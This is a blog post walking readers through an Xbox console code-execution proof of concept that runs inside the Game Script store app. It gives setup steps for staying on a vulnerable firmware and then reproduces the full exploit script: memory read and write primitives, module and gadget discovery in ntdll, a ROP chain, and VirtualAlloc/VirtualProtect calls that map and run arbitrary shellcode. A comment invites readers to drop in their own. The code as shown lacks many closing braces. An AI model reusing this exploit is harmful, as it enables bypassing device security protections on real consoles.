Wednesday, 12 June 2024

Xbox Kernel Code Execution in SystemOS POC Explained 2024/06

 In the Xbox wiki code execution via Game Script UWP App, it is available currently in Microsoft store which allows the writing and execution of scripts in custom language.  Although this is not a complete jailbreak it allows the running of custom scripts on Xbox one and Xbox series S/X consoles and does not offer piracy of games or running of backup games.  However this is a good first step into future processes that allow for jailbreak of modern Xbox consoles.

This exploit will likely be patched in the future, so if you have a spare Xbox lying around, it is good to update the firmware to the latest current version as of June 12, 2024.  As posted by Xbox One Research, perform the following. [10.0.25398.4478] should be the Xbox version you should be on.  If you are on a higher version, it probably means you are on the insider xbox version, just leave the insider program and update your xbox

1. Ensure your Xbox Live account login-type is configured as "No barriers" aka auto login with no password prompt

2. set your console as "Home Console" for this account

3. Download the App Game Script

4. Start the app (to ensure license is downloaded/cached)

5. Optional: Download Notepad T' as you can copy + paste txt files from USB drive with this app, meaning you do not need to type a lot of code manually with controller or get a rubber ducky (microcontroller keyboard like raspberry pi) device to type.

6. Take your console offline! To ensure that it cannot reach the internet, set a manual primary DNS address of

7. Go to carrot_c4k3's github post for the proof of concept exploit.  On the game script app you need to figure out how to get the windows to show up with the controller. It is not the convensional controller enter and exit on x and o for xbox but play around it until you get console window to show as well as the already shown code execution text area.  Use Notepad T' to copy the github post code from a usb drive on your Xbox then paste it to the Game Script App then run.  The sample code should console return 1337 which means code execution is possible on your console.  According to carror_c4k3's twitter post, the full exploit is being worked on and hopes to release it next month.

// sample shellcode: mov rax, 0x1337; ret;
// drop your own shellcode inplace here
let shellcode = [0x48,0xC7,0xC0,0x37,0x13,0x00,0x00,0xC3]
// hex printing helper functions
let i2c_map = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']
let c2i_map = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9, 'A': 0xA, 'B': 0xB, 'C': 0xC, 'D': 0xD, 'E': 0xE, 'F': 0xF}
fn hex_to_num(s) {
var str_len = len(s)
var res = 0
for (var i = 0; i < str_len; i++)
res = res << 4
res = res + c2i_map[s[i]]
return res
fn num_to_hex(num, byte_count) {
if (byte_count > 8) {
byte_count = 8
var res = ""
for (var i = 0; i < byte_count * 2; i++) {
var idx = (num >> (4 * i)) & 15
res = i2c_map[idx] + res
return res
fn num_to_hex8(num) {
return num_to_hex(num, 1)
fn num_to_hex16(num) {
return num_to_hex(num, 2)
fn num_to_hex32(num) {
return num_to_hex(num, 4)
fn num_to_hex64(num) {
return num_to_hex(num, 8)
fn hex_dump(addr, count) {
for (var i = 0; i < count; i++) {
if (i > 0 && (i % 16) == 0) {
var cur_byte = pointerGetUnsignedInteger8Bit(0, addr + i)
printConsole(num_to_hex8(cur_byte) + " ")
fn array_fill(arr) {
var arr_len = len(arr)
for (var i = 0; i < arr_len; i++) {
arr[i] = 0x41
fn round_down(val, bound) {
return floor(val - (val % bound))
fn array_compare(a1, a2) {
if (len(a1) != len(a2)) {
return false
var arr_len = len(a1)
for (var i = 0; i < arr_len; i++) {
if (a1[i] != a2[i]) {
return false
return true
// shorthand helpers for memory access
fn write8(addr, val) {
pointerSetUnsignedInteger8Bit(0, addr, val)
fn read8(addr) {
return pointerGetUnsignedInteger8Bit(0, addr)
fn write16(addr, val) {
pointerSetAtOffsetUnsignedInteger16Bit(0, addr, val)
fn read16(addr) {
return pointerGetAtOffsetUnsignedInteger16Bit(0, addr)
fn write32(addr, val) {
pointerSetAtOffsetUnsignedInteger(0, addr, val)
fn read32(addr) {
return pointerGetAtOffsetUnsignedInteger(0, addr)
fn write64(addr, val) {
pointerSetAtOffsetUnsignedInteger64Bit(0, addr, val)
fn read64(addr) {
return pointerGetAtOffsetUnsignedInteger64Bit(0, addr)
fn read_buf(addr, buf) {
var buf_len = len(buf)
for (var i = 0; i < buf_len; i++) {
buf[i] = read8(addr + i)
fn write_buf(addr, buf) {
var buf_len = len(buf)
for (var i = 0; i < buf_len; i++) {
write8(addr+i, buf[i])
fn find_bytes(addr, max_len, pattern, buf) {
for (var i = 0; i < max_len; i++) {
read_buf(addr + i, buf)
if (array_compare(pattern, buf)) {
return addr + i
return 0
fn find64(addr, max_len, v) {
var offset = 0
while (1) {
var temp_val = read64(addr+offset)
if (temp_val == v) {
return addr+offset
offset += 8
return 0
// shorthand funcs
fn ptr_to_num(p) {
return numberFromRaw64BitUnsignedInteger(p)
var gs_base = 0
var ntdll_base = 0
var kernelbase_base = 0
var longjmp_ptr = 0
var setjmp_ptr = 0
var gadget_ptr = 0
fn call_native(func_ptr, rcx, rdx, r8, r9) {
// allocate our objects
var obj_ptr = globalArrayNew8Bit("call", 0x100)
var objp = ptr_to_num(obj_ptr)
var vt_ptr = globalArrayNew8Bit("vtable", 0x18)
var vtp = ptr_to_num(vt_ptr)
var stack_size = 0x4000
var stack_ptr = globalArrayNew8Bit("stack", stack_size)
var stackp = ptr_to_num(stack_ptr)
var jmpctx_ptr = globalArrayNew8Bit("jctx", 0x100)
var jcp = ptr_to_num(jmpctx_ptr)
// set up vtable pointers
write64(vtp+8, setjmp_ptr)
write64(objp, vtp)
// trigger vtable call
memcpy(jmpctx_ptr, 0, obj_ptr, 0, 0x100)
// set up our rop chain
write64(stackp+stack_size-0xA0, rdx)
write64(stackp+stack_size-0x98, rcx)
write64(stackp+stack_size-0x90, r8)
write64(stackp+stack_size-0x88, r9)
write64(stackp+stack_size-0x80, 0)
write64(stackp+stack_size-0x78, 0)
write64(stackp+stack_size-0x70, func_ptr)
write64(stackp+stack_size-0x68, gs_base+0x1F13A)
write64(stackp+stack_size-0x38, 0x15151515)
write64(stackp+stack_size-0x30, gs_base+0x109C4A)
write64(stackp+stack_size-0x28, jcp)
write64(stackp+stack_size-0x20, longjmp_ptr);
// set up the vtable and setjmp context
write64(vtp+8, longjmp_ptr)
write64(objp, vtp)
write64(objp+0x10, stackp+stack_size-0xA0)
write64(objp+0x50, gadget_ptr)
// trigger vtable call
var ret_val = read64(stackp+stack_size-0x68)
// clean up our objects
return ret_val
fn find_module_base(addr) {
var search_addr = round_down(addr, 0x10000)
while (1) {
var magic_static = [0x4D, 0x5A]
var magic_read = [0, 0]
read_buf(search_addr, magic_read)
if (array_compare(magic_static, magic_read)) {
return search_addr
search_addr -= 0x10000
return 0
fn get_dll_exports(base_addr) {
var res = {}
var magic_static = [0x4D, 0x5A]
var magic_read = [0, 0]
read_buf(base_addr, magic_read)
if (!array_compare(magic_static, magic_read)) {
printConsole("Magic is invalid!\n")
return res
var e_lfanew = read32(base_addr+0x3c)
var exports_addr = base_addr + read32(base_addr+e_lfanew+0x70+0x18)
var num_funcs = read32(exports_addr+0x14)
var num_names = read32(exports_addr+0x18)
var funcs_addr = base_addr + read32(exports_addr+0x1c)
var names_addr = base_addr + read32(exports_addr+0x20)
var ords_addr = base_addr + read32(exports_addr+0x24)
for (var i = 0; i < num_names; i++) {
var name_addr = base_addr + read32(names_addr + (4 * i))
var name_str = pointerGetSubstring(0, name_addr, 0x20)
var ordinal = read16(ords_addr + (2 * i))
var func_addr = base_addr + read32(funcs_addr + (4 * ordinal))
res[name_str] = func_addr
return res
var VirtualAlloc_ptr = 0
var VirtualProtect_ptr = 0
fn map_code(code) {
var code_addr = call_native(VirtualAlloc_ptr, 0, 0x100000, 0x3000, 4)
write_buf(code_addr, code)
var oldp_ptr = globalArrayNew8Bit("oldp", 0x100)
var oldpp = ptr_to_num(oldp_ptr)
call_native(VirtualProtect_ptr, code_addr, 0x100000, 0x20, oldpp)
return code_addr
// create and dump our object to the terminal
var slbus_ptr = slBus_create()
var slp = numberFromRaw64BitUnsignedInteger(slbus_ptr)
// get the base of the GameScript module via the vtable
gs_base = read64(slp) - 0x16faf8
// find base addresses of ntdll and kernelbase
ntdll_base = find_module_base(read64(gs_base + 0x125398))
kernelbase_base = find_module_base(read64(gs_base + 0x1253A0))
// find longjmp and setjmp for call_native
var setjmp_bytes = [0x48,0x89,0x11,0x48,0x89,0x59,0x08,0x48,0x89,0x69,0x18,0x48,0x89,0x71,0x20,0x48]
var longjmp_bytes = [0x48,0x8B,0xC2,0x48,0x8B,0x59,0x08,0x48,0x8B,0x71,0x20,0x48,0x8B,0x79,0x28,0x4C]
var tmp_bytes = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
setjmp_ptr = find_bytes(ntdll_base, 0x217000, setjmp_bytes, tmp_bytes)
longjmp_ptr = find_bytes(ntdll_base, 0x217000, longjmp_bytes, tmp_bytes)
// find one of our gadgets in ntdll
var gadget_bytes = [0x5A,0x59,0x41,0x58,0x41,0x59,0x41,0x5A,0x41,0x5B,0xC3]
tmp_bytes = [0,0,0,0,0,0,0,0,0,0,0]
gadget_ptr = find_bytes(ntdll_base, 0x217000, gadget_bytes, tmp_bytes)
// get the ntdll & kernel base exports and find VirtualAlloc/Protect
var kernelbase_exports = get_dll_exports(kernelbase_base)
var ntdll_exports = get_dll_exports(ntdll_base)
VirtualAlloc_ptr = kernelbase_exports["VirtualAlloc"]
VirtualProtect_ptr = kernelbase_exports["VirtualProtect"]
// map our shellcode
var shellcode_addr = map_code(shellcode)
var shellcode_ret = call_native(shellcode_addr, 0, 0, 0, 0)
printConsole("Shellcode return value: " + num_to_hex64(shellcode_ret) + "\n")

I tested this myself on my series X console and it works.

Have a great day.

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Xbox Kernel Code Execution in SystemOS POC Explained 2024/06

 In the Xbox wiki  code execution via Game Script UWP App, it is available currently in Microsoft store which allows the writing and executi...